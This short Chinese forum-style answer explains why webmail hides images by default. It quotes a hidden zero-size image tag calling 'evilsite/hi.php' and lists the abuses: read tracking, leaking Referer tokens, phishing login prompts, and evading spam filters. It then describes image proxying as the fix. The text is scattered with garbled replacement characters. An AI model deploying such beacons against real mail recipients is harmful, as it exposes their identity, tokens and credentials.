站在黑客角度來給出答案����。
大多數專業郵箱都默認不顯示圖片����,因為:
http://evilsite/hi.php width=0 height=0 />
看����,src的值可以不需要是真圖片�����。
這樣可以隱蔽地得到郵件URL(即Referer���,即瀏覽器地址欄那個URL)����。
有什么用呢�����?
1. 郵件打開跟蹤:只要郵件被查看就會請求這個hi.php地址���,hi.php可以做好記錄�,除了記錄是否被請求了�����,還可記錄郵件URL�、用戶瀏覽器User-Agent��、用戶IP地址等�����。這個可以做個郵件跟蹤系統了:)
有了這個�,根本不需要「已讀回執」功能了���。
有了這個���,搞垃圾郵件群發的����,各位腦補下�����,他們會有多開心�����。
2. 某些手機端郵箱:傳統的WAP或APP(本質是Web的情況)���,Referer可能會包括用戶身份token�,這會導致身份token輕易泄露����,賬號被盜����。
3. 有人用hi.php來玩釣魚攻擊:hi.php可以被設置需要Auth等認證�,這時一查看郵箱就彈出一個Auth窗口���,提醒輸入用戶名密碼��,只要場景設計好����,有一定概率���,用戶會被釣魚�。
4. 確實����,圖片可以很好躲避基于文本的貝葉斯反垃圾機制���。默認屏蔽圖片�����,「意外」屏蔽了這個眼不見心不煩的煩惱
就這么小的一個點��,這些年來一直出現各種對抗���,出現個對抗又被修復���。什么是好郵箱�?好郵箱就是這么小的一個點����,必須把控好安全與體驗的那種平衡:)
目前Gmail采用的方式是用Google自己的服務器下載所有嵌入郵件的圖片�,之后在用戶打開郵件時使用服務器上的那份�。很安全�����,并且相對更User-friendly一些��。
